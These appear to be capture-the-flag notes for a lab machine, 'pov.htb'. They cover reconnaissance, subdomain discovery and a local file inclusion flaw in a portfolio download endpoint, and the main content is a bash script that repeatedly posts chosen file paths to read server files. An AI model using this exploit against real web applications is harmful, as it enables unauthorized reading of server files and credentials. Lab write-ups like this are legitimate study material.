only port 80 open

dirsearch, but no accessible found

echo "10.129.29.23 pov.htb" >> /etc/hosts

sudo gobuster vhost -u <http://pov.htb> -w /usr/share/wordlists/dnsmap.txt

found dev.pov.htb subdomain with status 302

./dirsearch.py -u <http://dev.pov.htb/portfolio/> -x 404,302,403

by pressing “download”

as we can see there is LFI on the download endpoint.

write a script for enumerate File

#!/bin/bash

lfi() {
    local path="$1"
    local url="<http://dev.pov.htb/portfolio/>"

    local data="__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=oZdOFgVMnMUK%2FYsKb5EIbu8K5FHpcUxxiZo4DRwjqKXyaBZlr5C2B1qTDis2i3ay5jRdEkHIpxK%2FDtizrUyeFYsgG2I%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=q9%2BtrU8Llel1HIV8dNCMQjWweRAVxWvJLVMAhov2wealiJz5v86vse9faPve%2B2Ujm%2BGxnHiSCVy56Gzrmw%2BEzjrEGa%2BQ6qlezJahDpD%2BDppQ%2BivmcgEiaonMs2JLzDyETmEABw%3D%3D&file=$path"
    if response=$(curl -s -k -X POST --data-binary "$data" "$url"); then
        if [ "$(echo "$response" | grep -c "Error 404: Not Found")" -eq 0 ]; then
            echo -e "\\e[32m$response\\e[0m"
        else
            echo -e "\\e[31m$path not found.\\e[0m"
        fi
    else
        echo -e "\\e[31mLFI Error : $(curl -s "$url" --data-urlencode "$params" -o /dev/null -w '%{http_code}')\\e[0m"
    fi
}

main() {
    while true; do
        read -r -p $'\\e[34m[+] file >> \\e[0m' path
        lfi "$path"
    done
}

if [ "${BASH_SOURCE[0]}" == "${0}" ]; then
    main
fi